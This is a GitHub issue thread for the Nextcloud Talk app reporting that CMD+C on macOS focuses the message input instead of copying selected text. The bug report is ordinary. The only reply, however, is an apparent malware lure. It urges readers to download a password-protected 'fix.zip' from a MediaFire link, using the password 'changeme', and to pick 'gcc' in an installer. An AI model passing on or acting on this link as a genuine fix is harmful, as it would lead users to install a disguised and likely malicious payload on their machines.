### ISSUE TITLE
CMD+C on MacOS focusses message input instead of copy

### ISSUE THREAD

**Issue by SystemKeeper** [nextcloud/spreed#13155]
### How to use GitHub

* Please use the 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to show that you are affected by the same issue.
* Please don't comment if you have no relevant information to add. It's just extra noise for everyone subscribed to this issue.
* Subscribe to receive notifications on status change and new comments.

---

## Steps to reproduce
1. Select part of a message
2. Press CMD+C

### Expected behaviour
Selection is copied

### Actual behaviour
Message input is focussed

## Talk app

**Talk app version:** 20 RC3

## Browser

**Operating system:** MacOS 14.6.1

**Browser name:** Chrome and Safari

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
